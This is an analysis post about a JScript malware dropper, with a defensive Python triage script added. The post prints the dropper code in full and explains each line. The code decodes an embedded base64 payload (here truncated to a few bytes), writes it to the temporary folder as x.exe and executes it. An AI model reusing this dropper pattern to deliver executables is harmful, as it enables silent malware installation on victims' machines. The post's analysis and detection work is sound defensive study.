Analysis of Malicious JavaScript
JavaScript, like other scripting languages, is widely used by malware developers to achieve their goals. In this article we briefly walk through the analysis of a JavaScript malware file. The sample decodes an executable embedded in the script as base64, writes it to disk and then runs it on the victim's system.
Sample Link : https://bazaar.abuse.ch/sample/ec5fed5b989a2f26c19a6cd23e5f307ab31e694415df0cdf78605c7be0be1ca6/
Malicious code (our scope):
var D=new ActiveXObject("Microsoft.XMLDOM")
var E=D.createElement("t")
E.dataType="bin.base64"
E.text="TVqQAAMAAAAEAAAA"
var b=new ActiveXObject("ADODB.Stream")
var p=new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2)
b.Type=1
b.Open()
b.Write(E.nodeTypedValue)
b.SaveToFile(p+"\\x.exe",2)
new ActiveXObject("WScript.Shell").Run(p+"\\x.exe")
Code analysis:
1- The malware developer declares a variable: var D=new ActiveXObject("Microsoft.XMLDOM"). ActiveXObject creates a COM object; it is available to JScript running in Internet Explorer and in Windows Script Host, and here it instantiates the MSXML DOM document.
2- var E=D.createElement("t") tells the XML DOM to create a new element (tag) named "t".
3- E.dataType="bin.base64" tells the DOM that the text of this element is base64-encoded binary data.
4- E.text="TVqQAAMAAAAEAAAA" stores the base64-encoded payload as the element's text; the listing shows only a short prefix of it.
5- var b=new ActiveXObject("ADODB.Stream") creates a stream object that can write binary data to a file.
6- var p=new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2) asks the file system object for special folder 2, the temporary folder (%TEMP%), and stores its path in p.
7- b.Type=1 means the stream holds binary data, not text.
8- b.Open() opens the binary stream.
9- b.Write(E.nodeTypedValue) writes the decoded bytes of the base64 text (nodeTypedValue returns the element's value decoded according to its dataType) into the stream.
10- b.SaveToFile(p+"\\x.exe",2) saves the executable (binary) into the %TEMP% folder as x.exe; the second argument 2 overwrites the file if it already exists.
11- new ActiveXObject("WScript.Shell").Run(p+"\\x.exe") uses the shell object to execute the file that was just written.
E.text="TVqQAAMAAAAEAAAA" decoded (the original screenshot of the decoded version is not reproduced here): the string decodes to the bytes 4D 5A 90 00 03 00 00 00 04 00 00 00, i.e. the "MZ" DOS header that begins every Windows executable.
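A small static triage script for this dropper pattern, added here as an example (it is not part of the original post or of the sample): it pulls the ActiveX ProgIDs out of the script, decodes the base64 assigned to a .text property, checks it for the MZ magic, resolves the GetSpecialFolder constant and records what gets saved and run. The SAMPLE string is constructed from the listing above (with the truncated 12-byte payload the post shows), and the regex names, the PROGID_CAPABILITY table and the verdict rule are the example's own.

```python
import base64
import json
import re

# Constructed sample input: the dropper listing from this post, verbatim. The base64
# is the truncated 12-byte fragment the post shows, not a complete executable.
SAMPLE = r'''var D=new ActiveXObject("Microsoft.XMLDOM")
var E=D.createElement("t")
E.dataType="bin.base64"
E.text="TVqQAAMAAAAEAAAA"
var b=new ActiveXObject("ADODB.Stream")
var p=new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2)
b.Type=1
b.Open()
b.Write(E.nodeTypedValue)
b.SaveToFile(p+"\\x.exe",2)
new ActiveXObject("WScript.Shell").Run(p+"\\x.exe")
'''

# Patterns for the constructs this family of WSH droppers relies on (example's own names)
ACTIVEX_RE = re.compile(r'new\s+ActiveXObject\(\s*"([^"]+)"\s*\)')
B64_TEXT_RE = re.compile(r'\.text\s*=\s*"([A-Za-z0-9+/=]{8,})"')
SAVE_RE = re.compile(r'SaveToFile\(\s*([^,]+),\s*(\d)\s*\)')
RUN_RE = re.compile(r'\.Run\(\s*([^)]+)\)')
FOLDER_RE = re.compile(r'GetSpecialFolder\(\s*(\d)\s*\)')

# What each COM ProgID gives the script; the four together form the classic dropper chain
PROGID_CAPABILITY = {
    "Microsoft.XMLDOM": "base64 decoding via XML DOM",
    "ADODB.Stream": "binary file write",
    "Scripting.FileSystemObject": "file system / special folder access",
    "WScript.Shell": "process execution",
}
# FileSystemObject.GetSpecialFolder constants
SPECIAL_FOLDERS = {"0": "WindowsFolder", "1": "SystemFolder", "2": "TemporaryFolder"}


def decode_payloads(script):
    """Decode every base64 string assigned to a .text property; skip invalid ones."""
    payloads = []
    for b64 in B64_TEXT_RE.findall(script):
        try:
            payloads.append(base64.b64decode(b64, validate=True))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return payloads


def is_pe(data):
    """Every Windows executable starts with the DOS stub magic 'MZ'."""
    return data[:2] == b"MZ"


def triage(script):
    """Static triage of a WSH dropper: objects used, payload type, drop and run targets."""
    progids = ACTIVEX_RE.findall(script)
    payloads = decode_payloads(script)
    report = {
        "activex_objects": progids,
        "capabilities": sorted({PROGID_CAPABILITY[p] for p in progids if p in PROGID_CAPABILITY}),
        "special_folders": [SPECIAL_FOLDERS.get(n, "unknown:" + n) for n in FOLDER_RE.findall(script)],
        "payload_sizes": [len(p) for p in payloads],
        "drops_pe": any(is_pe(p) for p in payloads),
        "save_targets": [m.group(1).strip() for m in SAVE_RE.finditer(script)],
        "run_targets": [m.group(1).strip() for m in RUN_RE.finditer(script)],
    }
    # Verdict rule: embedded PE + a file write + a process launch is the dropper pattern
    chain = report["drops_pe"] and report["save_targets"] and "process execution" in report["capabilities"]
    report["verdict"] = "dropper (writes and runs an embedded PE)" if chain else "inconclusive"
    return report


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE), indent=2))
```

Run it on a script file's contents instead of SAMPLE to get the same JSON report; on the sample above it lists all four ProgIDs, resolves folder 2 to TemporaryFolder, reports one 12-byte payload that starts with MZ, and flags the save/run of x.exe. The regexes only match the unobfuscated form shown in the post, so a string-concatenated or otherwise obfuscated variant needs de-obfuscation first.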